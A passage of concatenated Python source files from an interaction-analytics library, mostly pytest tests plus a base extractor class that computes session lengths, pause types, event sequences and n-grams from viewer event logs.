\nimport pandas as pd\nimport itertools\n\nfrom interlib.preprocessing import StatisticalSlices\n\n# Fixtures\[email protected]\ndef test_data():\n with open('tests/test_data_files/test_data.p', 'rb') as data_in:\n data = pickle.load(data_in)\n return data\n\[email protected]\ndef window_data():\n return [\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'NARRATIVE_ELEMENT_CHANGE'],\n ['NARRATIVE_ELEMENT_CHANGE', 'BUTTONS_DEACTIVATED']\n ]\n\[email protected]\ndef interaction_events():\n return { # set of user actions we consider\n 'PLAY_PAUSE_BUTTON_CLICKED', 'BACK_BUTTON_CLICKED', \n 'FULLSCREEN_BUTTON_CLICKED','NEXT_BUTTON_CLICKED', \n 'SUBTITLES_BUTTON_CLICKED', 'VOLUME_CHANGE',\n 'VIDEO_SCRUBBED', 'SEEK_BACKWARD_BUTTON_CLICKED', \n 'SEEK_FORWARD_BUTTON_CLICKED', 'VOLUME_MUTE_TOGGLED', \n 'VARIABLE_PANEL_NEXT_CLICKED', 'VARIABLE_PANEL_BACK_CLICKED',\n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE',\n 'LINK_CHOICE_CLICKED', 'USER_SET_VARIABLE'\n }\n\[email protected]\ndef stats_ground_truth():\n with open('tests/test_data_files/test_statistics.json', 'r') as data_in:\n data = json.load(data_in)\n return data\n\ndef test_splitting_array(test_data, window_data, interaction_events):\n ss = StatisticalSlices(test_data, interaction_events)\n for user, events in test_data.items():\n nec_indexes = []\n for idx, event in enumerate(events):\n if event['action_name'] == 'NARRATIVE_ELEMENT_CHANGE':\n nec_indexes.append(idx)\n \n assert ss._get_indices(events) == nec_indexes\n \n\ndef test_get_slices(test_data, interaction_events, stats_ground_truth):\n ss = StatisticalSlices(test_data, interaction_events)\n ss_slices = ss.get_slices()\n\n total_session_length = 0\n total_total_events = 0\n for val in ss_slices:\n if val['user'] == '959c1a91-8b0f-4178-bc59-70499353204f':\n total_session_length += val['session_length']\n total_total_events += val['total_events']\n\n for user, gt in stats_ground_truth.items():\n user_spec = [s for s in ss_slices if s['user'] == user]\n sess_len, hidden_time = 0, 0\n for item in user_spec:\n sess_len += item['session_length']\n hidden_time += item['hidden_time']\n \n assert gt['session_length'] == pytest.approx(sess_len, 0.1)\n assert gt['hidden_time'] == pytest.approx(hidden_time, 0.1)\n\ndef test_get_slices_df(test_data, interaction_events):\n ss = StatisticalSlices(test_data, interaction_events)\n ss_slices = ss.get_slices(as_df = True)\n\n print(ss_slices)\n # dfs = [\n # pd.DataFrame(val)\n # for val in ss_slices\n # ]\n # print(pd.concat(dfs))" }, { "alpha_fraction": 0.5634040236473083, "alphanum_fraction": 0.5703953504562378, "avg_line_length": 35.07826232910156, "blob_id": "a2e09180f32f04c481f1aff3169cd915df531168", "content_id": "18e78ad0238644039d5e0c857c976fb9a9f52c0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4148, "license_type": "no_license", "max_line_length": 97, "num_lines": 115, "path": "/interlib/preprocessing/base.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "from joblib import cpu_count\nfrom datetime import datetime as dt\nfrom typing import Union, Dict, Optional, List\n\nimport numpy as np\n\nfrom ..util.data import _get_users_clicked_start_button\n\nclass BaseExtractor():\n \"\"\" Base class for all of the extractors \"\"\"\n \n def __init__(\n self, \n user_event_dict: Dict[str, List], \n completion_point: Optional[str] = None, \n n_jobs: Optional[int] = -1\n ):\n if not isinstance(user_event_dict, dict):\n raise TypeError('User Event dictionary is not a dict')\n\n if len(user_event_dict) == 0:\n raise ValueError('User event dictionary must have at least one value or not None')\n\n if completion_point and not isinstance(completion_point, str):\n raise TypeError('completion_point should be a str')\n\n if not isinstance(n_jobs, int):\n raise TypeError('n_jobs should be an int')\n\n self.data = self._sort_events(user_event_dict)\n self.completion_point = completion_point\n self.n_jobs = n_jobs\n\n if self.completion_point:\n self._users_reached_completion_point, self.last_ne = self._reached_completion_point()\n else:\n self.last_ne = {user: np.nan for user in self.data.keys()}\n self._users_reached_completion_point = {user: False for user in self.data.keys()}\n\n if self.n_jobs == -1: self._num_cpu = cpu_count()\n else: self._num_cpu = n_jobs\n\n self._users = set(self.data.keys())\n self._users_split = self._split_users()\n\n def _sort_events(self, user_event_dict):\n data = {}\n for user, events in user_event_dict.items():\n data[user] = sorted(events, key = lambda x: x['timestamp'])\n return data\n\n def _split_users(self):\n \"\"\" \"\"\"\n split_events = [[] for _ in range(0, self._num_cpu)]\n splits = np.array_split(list(self._users), self._num_cpu)\n for idx, split in enumerate(splits):\n for u in split:\n for e in self.data[u]:\n split_events[idx].append(e)\n\n return zip(splits, split_events)\n\n def _reached_completion_point(self):\n \"\"\" \"\"\"\n reached_end = {}\n last_narrative_element_seen = {}\n for user, events in self.data.items():\n ne_changes = [\n change \n for change in events \n if change['action_type'] == 'STORY_NAVIGATION'\n ]\n\n if len(ne_changes) > 0:\n last_narrative_element_seen[user] = ne_changes[-1]['data']['romper_to_state']\n\n for ne_change in ne_changes:\n if ne_change['data']['romper_to_state'] == self.completion_point:\n reached_end[user] = True \n break\n \n if user not in reached_end.keys(): reached_end[user] = False\n\n return reached_end, last_narrative_element_seen\n\n def _type_of_pause(\n self, \n timestamp: dt, \n next_timestamp: dt\n ) -> Union[str, int]:\n \"\"\" \n Determine the type of pause that has happened based on\n two timestamps.\n\n :params timestamp: the current event time\n :params next_timestamp: the next event time\n :returns: the type of pause (str) and the difference\n between the two parameters\n \"\"\"\n if timestamp is None or next_timestamp is None:\n raise ValueError('Both timestamp parameters have to be initialised')\n \n if not isinstance(timestamp, dt) or not isinstance(next_timestamp, dt):\n raise TypeError('Timestamps is not a datetime object')\n\n if next_timestamp < timestamp:\n raise ValueError('Next timestamp cannot be before current timestamps')\n\n diff = (next_timestamp - timestamp).total_seconds()\n \n if 1 <= diff <= 5: return 'SP', diff # 1 -> 5\n elif 5 < diff <= 15: return 'MP', diff # 6 -> 15\n elif 15 < diff <= 30: return 'LP', diff # 16 -> 30\n elif diff > 30: return 'VLP', diff # more than 30\n else: return 0, diff # base case" }, { "alpha_fraction": 0.5803667902946472, "alphanum_fraction": 0.6528390645980835, "avg_line_length": 37.621212005615234, "blob_id": "fd505faf3eb5b473e9242f2ebae4660d15195880", "content_id": "df8409c77263a846818eb39deff04c88c8bed7e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10197, "license_type": "no_license", "max_line_length": 103, "num_lines": 264, "path": "/tests/test_util/test_data.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "import pytest \n\nimport json\nimport pandas as pd\nfrom numpy import delete\n\nfrom interlib.util.data import to_dict, _get_users_clicked_start_button\nfrom interlib.util.data import to_dataframe, reached_point, events_between_two_points\nfrom interlib.util import parse_raw_data\nfrom interlib.preprocessing.statistics import Statistics\n\[email protected]\ndef user_ids():\n return {\n 'b194b76c-7866-4b6d-8502-93ffe6322b64', '7b06a205-c793-4bdf-8533-013dc092d341',\n '015879da-4ee5-40c7-8826-5c323a0df742', '9760a350-b073-42de-b86a-3f4cfeecaf6e', \n 'b1728dff-021d-4b82-9afc-8a29264b53e4', '62d860e2-11ec-4a7c-82e2-c9bd3e369c83', \n '74e368cf-7a39-443d-a3cb-002f6957c8a3', 'be3720be-3da1-419c-b912-cacc3f80a427',\n '0c5b7783-0320-4818-bcb8-e244de363591', 'b4588353-cecb-4dee-ae8b-833d7888dec5', \n '21013769-f703-4531-9293-f2f4e114c248', '959c1a91-8b0f-4178-bc59-70499353204f'\n }\n\[email protected]\ndef data_location(): return 'tests/test_data_files/raw_test_data.json'\n\[email protected]\ndef interaction_events():\n return { # set of user actions we consider\n 'PLAY_PAUSE_BUTTON_CLICKED', 'BACK_BUTTON_CLICKED', \n 'FULLSCREEN_BUTTON_CLICKED','NEXT_BUTTON_CLICKED', \n 'SUBTITLES_BUTTON_CLICKED', 'VOLUME_CHANGE',\n 'VIDEO_SCRUBBED', 'SEEK_BACKWARD_BUTTON_CLICKED', \n 'SEEK_FORWARD_BUTTON_CLICKED', 'VOLUME_MUTE_TOGGLED', \n 'VARIABLE_PANEL_NEXT_CLICKED', 'VARIABLE_PANEL_BACK_CLICKED',\n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE',\n 'NARRATIVE_ELEMENT_CHANGE', 'LINK_CHOICE_CLICKED',\n 'USER_SET_VARIABLE'\n }\n\ndef test_to_dict_util(user_ids, data_location):\n user_events = to_dict(data_location)\n\n # check that the format is correct\n assert isinstance(user_events, dict)\n assert all(isinstance(x, list) for u, x in user_events.items())\n\n # check that all of the users are in the user events\n assert len(user_ids) == len(user_events.keys())\n for user, events in user_events.items():\n assert user in user_ids\n \ndef test_to_dict_split_util(user_ids, data_location):\n user_events = to_dict(data_location, split = True)\n\n # check that the format is correct: [{user -> [events]}, {user -> [events]}]\n assert isinstance(user_events, list)\n for chunk in user_events:\n assert isinstance(chunk, dict)\n assert all(isinstance(x, list) for u, x in chunk.items())\n\n # check whether they are sorted\n for user, sorted_events in chunk.items():\n assert all(\n sorted_events[i]['timestamp'] <= sorted_events[i + 1]['timestamp'] \n for i in range(len(sorted_events) - 1)\n )\n\ndef test_to_dict_user_subset(user_ids, data_location):\n user_ids = list(user_ids)\n subset_include = user_ids[:len(user_ids) // 2]\n subset_exclude = user_ids[len(user_ids) // 2:]\n user_events = to_dict(data_location, users_to_include = set(subset_include))\n\n assert len(subset_include) == len(user_events.keys())\n for user, events in user_events.items():\n assert user in subset_include\n assert user not in subset_exclude\n\ndef test_get_users_clicked_start_button(data_location, user_ids):\n with open(data_location, 'r') as in_file:\n data = parse_raw_data(\n raw_data = json.load(in_file), \n datetime_format = \"%Y-%m-%d %H:%M:%S.%f\", \n include_narrative_element_id = False\n )\n \n assert len(_get_users_clicked_start_button(data)) == len(user_ids)\n\ndef test_get_users_clicked_start_button_users_without_start_button(data_location, user_ids):\n with open(data_location, 'r') as in_file:\n data = parse_raw_data(\n raw_data = json.load(in_file), \n datetime_format = \"%Y-%m-%d %H:%M:%S.%f\", \n include_narrative_element_id = False\n )\n\n # remove the start button from a couple of the test users\n users_to_remove_start_button = {\n '21013769-f703-4531-9293-f2f4e114c248', \n '959c1a91-8b0f-4178-bc59-70499353204f'\n }\n \n # get the indexes of the two start button clickes\n del_idx = [\n idx \n for idx, event in enumerate(data) \n if event['user'] in users_to_remove_start_button and \n event['action_name'] == 'START_BUTTON_CLICKED'\n ]\n\n # delete the selected indexes using the numpy function\n data = delete(data, del_idx).tolist()\n\n # should be two less users\n assert len(_get_users_clicked_start_button(data)) == len(user_ids) - 2\n\ndef test_to_dict_util_errors(data_location):\n # test that a type error is thrown when:\n with pytest.raises(TypeError):\n # a non-string path is passed\n to_dict(path = 150)\n\n # a non-bool or non-int split value is passed\n to_dict(data_location, split = 3.5)\n\n # a non bool include narrative element id is passed\n to_dict(data_location, include_narrative_element_id = 1)\n\n # a non-bool sort is passed\n to_dict(data_location, sort = 1)\n\n # test that a value error is thrown when:\n with pytest.raises(ValueError):\n # a non-existing path is passed\n to_dict(path = 'foo/bar.json')\n\n# ----- to_dataframe tests ------\ndef test_to_dataframe(user_ids, data_location, interaction_events):\n user_events = to_dict(data_location)\n\n stats = Statistics(user_events)\n user_statistics = stats.calculate_statistics(interaction_events)\n df = to_dataframe(user_statistics)\n\n # check that it's a dataframe that is returned\n assert type(df) == pd.DataFrame\n\n # check that the columns are the same as the keys\n for col in df.columns:\n if col == 'user': continue # this won't be in the columns\n assert col in user_statistics['b194b76c-7866-4b6d-8502-93ffe6322b64'].keys()\n\n # check that the values in the cells match for a user\n for stat_name, stat_value in user_statistics['b194b76c-7866-4b6d-8502-93ffe6322b64'].items():\n assert df[df['user'] == 'b194b76c-7866-4b6d-8502-93ffe6322b64'][stat_name].item() == stat_value\n\n# ----- reached point test -----\ndef test_reached_point(data_location):\n user_events = to_dict(data_location)\n\n point = 'CH00_Introduction'\n expected_users_removed = 'be3720be-3da1-419c-b912-cacc3f80a427'\n\n reached_point_users = reached_point(user_events, point)\n\n assert len(reached_point_users) == len(user_events.keys()) - 1\n assert expected_users_removed not in reached_point_users\n\ndef test_reached_point_filter(data_location):\n user_events = to_dict(data_location)\n\n point = 'CH00_Introduction'\n expected_users_removed = 'be3720be-3da1-419c-b912-cacc3f80a427'\n\n updated_user_events = reached_point(user_events, point, filter = True)\n\n assert len(updated_user_events.keys()) == len(user_events.keys()) - 1\n assert expected_users_removed not in updated_user_events.keys()\n\n# ----- events between two points test -----\ndef test_events_between_two_points(data_location):\n user_events = to_dict(data_location)\n\n users_reached_end = set([ # determined from mysql query on data\n 'b4588353-cecb-4dee-ae8b-833d7888dec5',\n 'b1728dff-021d-4b82-9afc-8a29264b53e4',\n '959c1a91-8b0f-4178-bc59-70499353204f',\n 'b194b76c-7866-4b6d-8502-93ffe6322b64'\n ])\n\n start = 'CH00_Introduction'\n end = '09_Ronaldo'\n\n updated_events = events_between_two_points(user_events, start, end)\n\n for user, events in updated_events.items():\n if len(events) > 0:\n if user in users_reached_end: # these are users that got to the end point\n assert (events[0]['data']['romper_to_state'] == start and \n events[-1]['data']['romper_to_state'] == end)\n else:\n assert events[0]['data']['romper_to_state'] == start\n\n\ndef test_events_between_two_points_alternative_end(data_location):\n user_events = to_dict(data_location)\n users_reached_end = set([ # determined from mysql query on raw data\n '21013769-f703-4531-9293-f2f4e114c248',\n '62d860e2-11ec-4a7c-82e2-c9bd3e369c83'\n ])\n\n start = 'CH00_Introduction'\n end = '05: Selena'\n\n updated_events = events_between_two_points(user_events, start, end)\n\n for user, events in updated_events.items():\n if len(events) > 0:\n if user in users_reached_end: # these are users that got to the end point\n assert (events[0]['data']['romper_to_state'] == start and \n events[-1]['data']['romper_to_state'] == end)\n else:\n assert events[0]['data']['romper_to_state'] == start\n \n\ndef test_events_between_two_points_filter(data_location):\n user_events = to_dict(data_location)\n\n start = 'CH00_Introduction'\n end = '09_Ronaldo'\n\n updated_events = events_between_two_points(user_events, start, end, filter = True)\n\n # there should be one less user\n assert len(updated_events.keys()) == len(user_events.keys()) - 1\n\n # we know that this user doesn't get past the start, so they should be in the keys\n assert 'be3720be-3da1-419c-b912-cacc3f80a427' not in updated_events.keys()\n\n\ndef test_events_between_two_points_using_representation_id(data_location):\n user_events = to_dict(data_location)\n users_reached_end = set([ # determined from mysql query on data\n 'b4588353-cecb-4dee-ae8b-833d7888dec5',\n 'b1728dff-021d-4b82-9afc-8a29264b53e4',\n '959c1a91-8b0f-4178-bc59-70499353204f',\n 'b194b76c-7866-4b6d-8502-93ffe6322b64'\n ])\n\n start = '66f663b2-16ec-4321-abc3-5f582d0649ef' # CH00_Introduction\n end = '0d51a32c-d05c-439b-8317-8b36ef0e6d10' # 09_Ronaldo\n\n updated_events = events_between_two_points(\n user_events, start, end, using_representation_id = True)\n\n for user, events in updated_events.items():\n if len(events) > 0:\n if user in users_reached_end: # these are users that got to the end point\n assert (events[0]['data']['current_narrative_element'] == start and \n events[-1]['data']['current_narrative_element'] == end)\n else:\n assert events[0]['data']['current_narrative_element'] == start\n\n# TODO: test for parse raw data\n\n" }, { "alpha_fraction": 0.612662136554718, "alphanum_fraction": 0.6355047821998596, "avg_line_length": 37.548912048339844, "blob_id": "671810d91fe11fd7360214d6223502a7d93edd03", "content_id": "7d52fbbe6d6daea0299df109245e9fba042e00ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7092, "license_type": "no_license", "max_line_length": 99, "num_lines": 184, "path": "/tests/test_preprocessing/test_sequences.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "import pytest \nimport pickle, json, datetime\n\nfrom collections import Counter, defaultdict\n\nfrom interlib.preprocessing.sequences import Sequences\n\n# Fixtures\[email protected]\ndef test_data():\n with open('tests/test_data_files/test_data.p', 'rb') as data_in:\n data = pickle.load(data_in)\n return data\n\[email protected]\ndef sequence_data():\n with open('tests/test_data_files/test_sequences.json', 'rb') as data_in:\n data = json.load(data_in)\n return data\n\[email protected]\ndef interaction_events():\n return { # set of user actions we consider\n 'PLAY_PAUSE_BUTTON_CLICKED', 'BACK_BUTTON_CLICKED', \n 'FULLSCREEN_BUTTON_CLICKED', 'NEXT_BUTTON_CLICKED', \n 'SUBTITLES_BUTTON_CLICKED', 'VOLUME_CHANGE',\n 'VIDEO_SCRUBBED', 'SEEK_BACKWARD_BUTTON_CLICKED', \n 'SEEK_FORWARD_BUTTON_CLICKED', 'VOLUME_MUTE_TOGGLED', \n 'VARIABLE_PANEL_NEXT_CLICKED', 'VARIABLE_PANEL_BACK_CLICKED',\n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE',\n 'NARRATIVE_ELEMENT_CHANGE', 'LINK_CHOICE_CLICKED',\n 'USER_SET_VARIABLE'\n }\n\[email protected]\ndef aliases():\n return {\n \"PLAY_PAUSE_BUTTON_CLICKED\": \"PP\", \"LINK_CHOICE_CLICKED\": \"LC\",\n \"FULLSCREEN_BUTTON_CLICKED\": \"FS\", \"NEXT_BUTTON_CLICKED\": \"NB\",\n \"VIDEO_SCRUBBED\": \"VS\", \"SEEK_FORWARD_BUTTON_CLICKED\": \"SFW\",\n \"BACK_BUTTON_CLICKED\": \"BB\", \"SEEK_BACKWARD_BUTTON_CLICKED\": \"SBK\",\n \"USER_SET_VARIABLE\": \"US\", \"VOLUME_CHANGE\": \"VC\",\n \"BROWSER_VISIBILITY_CHANGE\": \"BVC\", \"WINDOW_ORIENTATION_CHANGE\": \"WOC\",\n \"NARRATIVE_ELEMENT_CHANGE\": \"NEC\", \"VOLUME_MUTE_TOGGLED\": 'VM', \n \"VARIABLE_PANEL_NEXT_CLICKED\": \"VPN\", \"VARIABLE_PANEL_BACK_CLICKED\": \"VPB\",\n \"SUBTITLES_BUTTON_CLICKED\": \"SUB\"\n }\n\[email protected]\ndef ngrams():\n return [\n ('NEC', 'SP'), ('SP', 'PP'), ('PP', 'SP'), ('SP', 'LC'), ('LC', 'SP'),\n ('SP', 'NEC'), ('NEC', 'SP'), ('SP', 'BVC_H'), ('BVC_H', 'VLP'),\n ('VLP', 'BVC_V'), ('BVC_V', 'SP'), ('SP', 'US'), ('US', 'VPN'),\n ('VPN', 'SP'), ('SP', 'US'), ('US', 'VPN'), ('VPN', 'SP'), ('SP', 'US'),\n ('US', 'VPN'), ('VPN', 'SP'), ('SP', 'VPN'), ('VPN', 'SP'), ('SP', 'VPN'),\n ('VPN', 'SP'), ('SP', 'NEC'), ('NEC', 'SP'), ('SP', 'NEC')\n ]\n\n# ------ COMPRESS SEQUENCE TESTS ------\ndef test_compress_sequence(test_data):\n sequence = ['NEC', 'PP', 'NEC', 'NEC', 'NEC', 'BB', 'NB', 'NEC']\n expected_sequence = ['NEC_1', 'PP', 'NEC_3', 'BB', 'NB', 'NEC_1']\n\n seq = Sequences(test_data, n_jobs = 1)\n compressed_sequence = seq._compress_events(sequence)\n\n for indx, val in enumerate(compressed_sequence):\n assert val == expected_sequence[indx]\n\ndef test_compress_sequence_link_choice(test_data):\n sequence = ['LC', 'LC', 'LC', 'WOC', 'LC', 'NEC', 'LC', 'NB', 'BB', 'PP']\n expected_sequence = ['LC_3', 'WOC', 'LC_1', 'NEC', 'LC_1', 'NB', 'BB', 'PP']\n\n seq = Sequences(test_data, n_jobs = 1)\n compressed_sequence = seq._compress_events(sequence, compress_event = 'LC')\n\n for indx, val in enumerate(compressed_sequence):\n assert val == expected_sequence[indx]\n\ndef test_compress_sequence_no_compression_needed(test_data):\n sequence = ['LC', 'NEC', 'PP', 'NB', 'BB', 'SP', 'LP', 'MP', 'VLP']\n expected_sequence = sequence\n\n seq = Sequences(test_data, n_jobs = 1)\n compressed_sequence = seq._compress_events(sequence, compress_event = '')\n\n for indx, val in enumerate(compressed_sequence):\n assert val == expected_sequence[indx]\n\n# ----- SEQUENCES TEST ------\ndef test_sequences_single_user(test_data, sequence_data, interaction_events, aliases):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seq = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases,\n user_id = '0c5b7783-0320-4818-bcb8-e244de363591'\n )\n\n assert extracted_seq == sequence_data['0c5b7783-0320-4818-bcb8-e244de363591']['non_compressed']\n\ndef test_sequences_all_users(test_data, sequence_data, interaction_events, aliases):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seqs = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases\n )\n\n for user, seq_types in sequence_data.items():\n assert extracted_seqs[user] == seq_types['non_compressed']\n\ndef test_sequences_compressed_single_user(test_data, sequence_data, interaction_events, aliases):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seq = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases,\n user_id = 'b194b76c-7866-4b6d-8502-93ffe6322b64',\n compress = True,\n compress_event = 'SFW'\n )\n\n assert extracted_seq == sequence_data['b194b76c-7866-4b6d-8502-93ffe6322b64']['compressed']\n\ndef test_sequences_ngrams(test_data, interaction_events, aliases, ngrams):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seq = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases\n )\n\n user_ngrams = seq.get_ngrams(n = 2)\n assert ngrams == user_ngrams['0c5b7783-0320-4818-bcb8-e244de363591']\n \ndef test_sequences_ngrams_counts(test_data, interaction_events, aliases, ngrams):\n seq = Sequences(test_data, n_jobs = 1)\n extracted_seq = seq.get_sequences(\n interaction_events = interaction_events,\n aliases = aliases\n )\n\n user_ngrams, counts, user_counts = seq.get_ngrams(n = 2, counter = True)\n\n # create a counter to automate the testing a bit\n gt_counts = defaultdict(int)\n for each_gram in ngrams:\n gt_counts[each_gram] += 1\n \n for pair, value in user_counts['0c5b7783-0320-4818-bcb8-e244de363591'].items():\n assert gt_counts[pair] == value\n\ndef test_mismatched_interaction_events_and_aliases(test_data, interaction_events, aliases):\n seq = Sequences(test_data)\n\n # remove one element from aliases\n aliases.pop(\"NARRATIVE_ELEMENT_CHANGE\")\n\n with pytest.raises(ValueError):\n seq.get_sequences(interaction_events, aliases)\n\n # put it back and try again by removing something from interaction events\n aliases['NARRATIVE_ELEMENT_CHANGE'] = \"NEC\"\n interaction_events.remove('NARRATIVE_ELEMENT_CHANGE')\n\n with pytest.raises(ValueError):\n seq.get_sequences(interaction_events, aliases)\n\ndef test_errors_are_thrown(test_data, interaction_events, aliases):\n seq = Sequences(test_data)\n\n with pytest.raises(TypeError):\n # should throw an error when a list is passed (needs to be a dict)\n seq.get_sequences(interaction_events = [], aliases = aliases)\n\n # should throw an error when something other than a dictionary is passed\n seq.get_sequences(interaction_events = interaction_events, aliases = [])\n\n# def test_sequence_time_threshold(test_data, interaction_events, aliases):\n# seq = Sequences(test_data, n_jobs = 1)\n# extracted_seq = seq.get_sequences(\n# interaction_events = interaction_events,\n# aliases = aliases,\n# time_threshold = 30\n# )\n# print(extracted_seq)" }, { "alpha_fraction": 0.6414734125137329, "alphanum_fraction": 0.6566545367240906, "avg_line_length": 38.53959655761719, "blob_id": "f77066ebab76e07f5f17165c7ce9240202902225", "content_id": "3261c58817cf2cd3473efeca891d39f68efc2868", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21474, "license_type": "no_license", "max_line_length": 113, "num_lines": 543, "path": "/tests/test_preprocessing/test_stats.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "from numpy.core.defchararray import add\nimport pytest\n\nimport pickle, json, datetime\nfrom datetime import datetime as dt \nfrom datetime import timedelta\nfrom collections import defaultdict\n\nfrom interlib.preprocessing.statistics import Statistics\n\n# Fixtures\[email protected]\ndef test_data():\n with open('tests/test_data_files/test_data.p', 'rb') as data_in:\n data = pickle.load(data_in)\n return data\n\[email protected]\ndef ground_truth():\n with open('tests/test_data_files/test_statistics.json', 'r') as data_in:\n data = json.load(data_in)\n return data\n\[email protected]\ndef interaction_events():\n return { # set of user actions we consider\n 'PLAY_PAUSE_BUTTON_CLICKED', 'BACK_BUTTON_CLICKED', \n 'FULLSCREEN_BUTTON_CLICKED','NEXT_BUTTON_CLICKED', \n 'SUBTITLES_BUTTON_CLICKED', 'VOLUME_CHANGE',\n 'VIDEO_SCRUBBED', 'SEEK_BACKWARD_BUTTON_CLICKED', \n 'SEEK_FORWARD_BUTTON_CLICKED', 'VOLUME_MUTE_TOGGLED', \n 'VARIABLE_PANEL_NEXT_CLICKED', 'VARIABLE_PANEL_BACK_CLICKED',\n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE',\n 'NARRATIVE_ELEMENT_CHANGE', 'LINK_CHOICE_CLICKED',\n 'USER_SET_VARIABLE'\n }\n\[email protected]\ndef event_frequencies():\n with open('tests/test_data_files/test_event_frequencies.json', 'r') as data_in:\n data = json.load(data_in)\n return data\n\[email protected]\ndef time_stats():\n return {\n 'hidden_time', 'raw_session_length', \n 'session_length', 'time_to_completion', 'reach_end'}\n\n# ------ INIT ------\ndef test_init(test_data):\n with pytest.raises(ValueError):\n stats = Statistics(user_event_dict = {})\n\n with pytest.raises(TypeError):\n stats = Statistics(user_event_dict = [])\n\n stats = Statistics(test_data)\n assert stats.data.keys() == test_data.keys()\n assert stats.n_jobs == 1\n \n# ----- SPLIT USERS ------\ndef test_split_users_correct_chunks(test_data):\n # test that the data is split up into the correct chunks\n stats = Statistics(test_data, n_jobs = 4)\n for i, (u_chunk, d_chunk) in enumerate(stats._users_split):\n if i == 0: assert len(u_chunk) == 4\n else: assert len(u_chunk) == 3\n\ndef test_split_users_single_array(test_data):\n # test that when the n jobs is 1 that the array remains a single array\n stats = Statistics(test_data, n_jobs = 1)\n for u_chunk, d_chunk in stats._users_split:\n assert len(u_chunk) == len(test_data)\n\ndef test_split_users_correspond_to_data_chunk(test_data):\n # test that all of the events in the data chunk correspond to that user\n stats = Statistics(test_data, n_jobs = -1)\n for u_chunk, d_chunk in stats._users_split: \n # get the set of users in the d chunk and compare with the u_chunk\n users_in_d_chunk = set([e['user'] for e in d_chunk])\n assert len(users_in_d_chunk) == len(u_chunk)\n assert set(u_chunk.tolist()) == users_in_d_chunk\n\n# ----- TIME STATISTICS -----\ndef test_time_statistics(test_data, ground_truth):\n stats = Statistics(test_data, n_jobs = -1)\n res = stats.time_statistics()\n \n # test the the statistics calculated (with some allowance in the precision)\n for u, s in ground_truth.items():\n raw_sess_len = res[u]['raw_session_length']\n hidden_time = res[u]['hidden_time']\n sess_len = res[u]['session_length']\n\n assert s['raw_session_length'] == pytest.approx(raw_sess_len, 0.1)\n assert s['hidden_time'] == pytest.approx(hidden_time, 0.1)\n assert s['session_length'] == pytest.approx(sess_len, 0.1)\n\ndef test_time_statistics_empty_events(test_data, ground_truth):\n \"\"\" Test that empty events are dealt with \"\"\"\n test_data_copy = test_data.copy()\n user_to_delete = list(test_data_copy.keys())[0]\n test_data_copy[user_to_delete] = [] # remove their events\n\n stats = Statistics(test_data_copy)\n res = stats.time_statistics()\n\n assert res[user_to_delete]['raw_session_length'] == 0.0\n assert res[user_to_delete]['hidden_time'] == 0.0\n assert res[user_to_delete]['session_length'] == 0.0\n\ndef test_that_statistics_are_not_recalculated(test_data):\n stats = Statistics(test_data)\n res_one = stats.time_statistics()\n res_two = stats.time_statistics()\n\n assert res_one == res_two\n\ndef test_getting_only_session_length(test_data, ground_truth):\n stats = Statistics(test_data)\n res = stats.session_length()\n \n for user, stat in res.items():\n assert ground_truth[user]['session_length'] == pytest.approx(stat, 0.1)\n\ndef test_getting_only_session_length_one_user(test_data, ground_truth):\n stats = Statistics(test_data)\n \n user_to_retrieve = list(test_data.keys())[0]\n sess_len = stats.session_length(user_id = user_to_retrieve)\n\n assert ground_truth[user_to_retrieve]['session_length'] == pytest.approx(sess_len, 0.1)\n\n # test that value error is raised if the user doesn't exist\n with pytest.raises(ValueError):\n stats.session_length(user_id = 'user_id')\n\n# ----- TIME TO COMPLETION ------\ndef test_time_to_completion(test_data, ground_truth):\n stats = Statistics(test_data, completion_point = 'Credits')\n\n res = stats.time_statistics()\n\n for user, stat in res.items():\n toc = stat['time_to_completion']\n assert ground_truth[user]['time_to_completion'] == pytest.approx(toc, 0.1)\n\n# ----- PAUSE STATISTICS -----\ndef test_type_of_pause(test_data):\n stats = Statistics(test_data)\n\n ts = dt(2020, 1, 1, 10, 00, 00) # define a base timestamp to compare to\n\n sp_res = stats._type_of_pause(ts, ts + timedelta(0, 3))\n mp_res = stats._type_of_pause(ts, ts + timedelta(0, 10))\n lp_res = stats._type_of_pause(ts, ts + timedelta(0, 20))\n vlp_res = stats._type_of_pause(ts, ts + timedelta(0, 50))\n\n assert sp_res[0] == 'SP' and sp_res[1] == 3.0\n assert mp_res[0] == 'MP' and mp_res[1] == 10.0\n assert lp_res[0] == 'LP' and lp_res[1] == 20.0\n assert vlp_res[0] == 'VLP' and vlp_res[1] == 50.0\n\ndef 